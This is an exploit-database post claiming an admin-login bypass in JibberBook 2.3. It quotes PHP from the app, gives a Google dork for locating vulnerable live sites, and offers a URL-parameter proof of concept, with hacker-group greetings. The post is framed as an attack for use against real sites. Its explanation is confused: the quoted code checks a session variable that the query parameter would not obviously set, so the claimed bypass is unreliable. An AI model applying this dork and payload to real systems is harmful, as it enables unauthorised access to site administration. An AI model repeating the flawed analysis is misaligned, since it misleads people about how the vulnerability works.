facebook facebook twitter rss

jibberbook Bypass Admin Vulnerability

Author: Asmar , Published: 07-05-2012
#################################################
# Exploit Title : jibberbook Bypass Admin Vulnerability
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : win\XP
#
# Dork : allintext: "JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) SCript
# 2) Info Vulnerabilty
# 3) P0c
#
#
#################################################
#
# 1) SCript:
# JibberBook allow the visitor to make comment or any thing like how visitor like website :)
# or any msg for admin of site.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allow attacker to log into the admin panel with out write username or password .
# Look Into The File index.php In jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php', 'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# We have Require to File Named Secure , Lets Check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
# if (is_file(realpath('login_form.php'))) {
# $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
# } else {
# $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
# }
# header("Location: $url");
# exit();
# } else {
# $loggedin = true;
# }
#
# The file don't have any secure here :P.
# Cz Look To Below Header , We Have else Loggedin = True, its mean if the attacker not admin required to login_form.php
# else , Loggedin = true , Admin Redirect to Admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz.
# Over-X <3, And All My Friends.
#
#################################################

Like us on Facebook :